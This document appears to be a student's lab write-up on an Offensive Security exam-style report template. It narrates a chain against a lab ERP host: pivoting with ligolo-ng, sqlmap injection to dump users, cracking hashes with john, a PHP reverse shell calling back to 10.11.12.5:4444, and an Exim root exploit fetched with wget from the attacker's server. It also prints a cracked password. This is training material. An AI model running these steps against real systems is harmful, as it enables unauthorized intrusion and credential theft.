Offensive Security

Penetration Test Report for

DOLBUCK DORVACK.ERP
v.3.2

©
All rights reserved to Offensive Security, 2014

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from Offensive Security.

1 | Page
Table of Contents

1.0 Offensive Security Exam Penetration Test Report 2

1.1 Introduction 3

1.2 Objective 3

1.3 Requirements 3

2.0 High-Level Summary 4

2.1 Recommendations 5

3.0 Methodologies 5

3.1 Information Gathering 5

3.2 Penetration 6

System IP: 192.168. () 6

4.0 Additional Items

2 | Page
1.0 Offensive Security Exam Penetration Test Report
1.1 Introduction
The Offensive Security Exam penetration test report contains all efforts that were conducted in order to
pass the Offensive Security exam. This report will be graded from a standpoint of correctness and fullness
to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding
of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the
Offensive Security Certified Professional.

1.2 Objective
The objective of this assessment is to perform an internal penetration test against the Offensive Security
Exam network. The student is tasked with following a methodical approach in obtaining access to the
objective goals. This test should simulate an actual penetration test and how you would start from beginning
to end, including the overall report. An example page has already been created for you at the latter portions
of this document that should give you ample information on what is expected to pass this course. Use the
sample report as a guideline to get you through the reporting.

1.3 Requirements
The student will be required to fill out this penetration testing report fully and to include the following
sections:

● Overall High-Level Summary and Recommendations (non-technical)

● Methodology walkthrough and detailed outline of steps taken
● Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
● Any additional items that were not included

3 | Page
2.0 High-Level Summary
I was tasked with performing an internal penetration test towards Offensive Security Exam. An internal
penetration test is a dedicated attack against internally connected systems. The focus of this test is to
perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam
systems – the THINC.local domain. My overall objective was to evaluate the network, identify systems,
and exploit flaws while reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming vulnerabilities that were
identified on Offensive Security’s network. When performing the attacks, I was able to gain access to
multiple machines, primarily due to outdated patches and poor security configurations. During the testing,
I had administrative level access to multiple systems. All systems were successfully exploited and access
granted. These systems as well as a brief description on how access was obtained are listed below:

● 192.168.xx.xx (hostname) - Name of initial exploit

● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - Name of initial exploit
● 192.168.xx.xx (hostname) - BOF

4 | Page
2.1 Recommendations
I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot
exploit these systems in the future. One thing to remember is that these systems require frequent patching
and once patched, should remain on a regular patch program to protect additional vulnerabilities that are
discovered at a later date.

3.0 Methodologies
I utilized a widely adopted approach to performing penetration testing that is effective in testing how well
the Offensive Security Exam environments is secured. Below is a breakout of how I was able to identify
and exploit the variety of systems and includes all individual vulnerabilities found.

3.1 Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration
test. During this penetration test, I was tasked with exploiting the exam network. The specific IP addresses
were:

Exam Network

● 192.168.
● 192.168.
● 192.168.
● 192.168.
● 192.168.

5 | Page
3.2 Penetration
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
During this penetration test, I was able to successfully gain access to X out of the X systems.

System IP: 192.168.1.121

Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what services
are alive on a system or systems. This is valuable for an attacker as it provides detailed information on
potential attack vectors into a system. Understanding what applications are running on the system gives an
attacker needed information before performing the actual penetration test. In some cases, some ports may
not be listed.

Server IP Address Ports Open

192.168.1.134 TCP: 22/80

UDP:

This exercise is a continuation of the previous lab called dorvack.corp and Dorvack Files, so we will use
the SSH credentials obtained previously to connect to the IP 172.20.0.235

sudo ssh user@172.20.0.235

6 | Page
and we will check which connections are known by our server

/usr/sbin/arp -n

We can see that we have a connection to IP 192.168.1.1, but we can't get to that IP directly

In order for the attacker computer to communicate with the IP 192.168.1.1, we will use the linogo tool

https://github.com/nicocha30/ligolo-ng

7 | Page
On the Dorvack PC we will do a wget to get the Linogo agent file

On the attacking computer, we will create a virtual interface for Linogo

And we'll see if it was created correctly with the -n 1 ip a command

8 | Page
And we make a static path for Linogo pointing to the victim computer's network

The other Linogo Proxy file will be used from the attacking computer, and we will give it execution
permissions

9 | Page
And we run it, to avoid any certificate problems, we use the -sefcert parameter

Now on the pivot machine we give execution permissions to the agent file and execute

We go back to the attacking machine and we see that Ligolo made the connection to the agent and we
perform the tunneling

Now that Linogo created the connection, we need to create a listen port to have a more complete connection
and if we want, send files between each machine

10 | Page
After this, we can now ping directly from the attacking machine to IP 192.168.1.134

Now that there is a connection, we go to the web browser, and we can see in the IP 192.168.1.134 the web
erp service

Now that we have access from the attacking machine with Kali, to segment 192.168.1.0, we can use the
tools directly, we will use nmap to obtain information from the machine

11 | Page
We will use nmap to obtain information from the server

We will use the sqlmap tool to obtain more information

sqlmap -u http://192.168.1.134/\?nid\= --level 4 --dbs

And in the result, we see 2 databases:

12 | Page
sqlmap -u http://192.168.1.134/\?nid\= --level 4 -D d7db –tables

With this command, we will extract the information from the databases

13 | Page
In the results we see that a table of users appears, we will download their information

sqlmap -u http://192.168.1.134/\?nid\= --level 4 -D d7db -T users –dump

14 | Page
3 users have been found, but only 2 hashes, we copy and save them in a .txt and use the john tool and the
rockyou wordlist to try to obtain the password from the hashes, if the rockyou file is not there, download
it from github and rename it to rockyou.lst

The wordlist route is usr/share/wordlists

15 | Page
We copy the hash.txt file with the hashes obtained to the wordlists path and run the john tool

Now that we got the password “alaturideingeri” let's go to the website

16 | Page
And we will proceed to log in with the credentials of john:alaturideingeri

17 | Page
With the session started we will proceed to explore the site and as we saw, there is an option to upload
information, and in the options, you can modify the html with php options

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

So we will go to github and copy the reverse shell php code

18 | Page
And we will modify only the data that says “change this”

19 | Page
In IP we will put the IP of the VPN 10.11.12.5 and the port of our choice, in our case, 4444

It is important to write a message above the php code, since only with the code, the reverse shell presents
errors, we save the changes.....

We generate a port in listening mode pointing to the port

We return to the contact form, complete it and execute the action to force the reverse Shell with the

20 | Page
“submit” button

When we check the listening port again, we see that the system has already connected

We explore the path cd /home and find the first flag inside a file called flag.zip

21 | Page
Exploring the permissions we can see that there is exim4 which is a mail server, and one of the clues in
the lab talked about looking at the mail

22 | Page
Therefore we see the version, and if it is vulnerable

dpkg -l | grep exim

Exim 4.87 - 4.91 - Local Privilege Escalation

https://www.exploit-db.com/exploits/46996

There is a privilege escalation explit with exim

We download the exploit and open a terminal

23 | Page
We open a terminal in the same exploit route to check our connections and see which one has the VPN
IP, and we select that with the command:

ifconfig tun0; sudo python3 -m http.server 80

24 | Page
We will return to the terminal that has the session on the server that opened the reverse shell and we will
go to the path cd /tmp

25 | Page
In this route we will make the copy of the exploit

wget http://10.11.12.5/46996.sh

And with them we see that it was downloaded

chmod 777 46996.sh we give it execution permissions

We open another terminal and leave a listening port enabled on the exploit port (this information is within
the exploit itself if we check it with nano or cat)

26 | Page
And we execute the exploit with the command:

bash 46996.sh -m netcat

We make the query with the id command and we see that we are root, we go to the cd/root path and we
see the root flag with cat flag.txt

27 | Page
28 | Page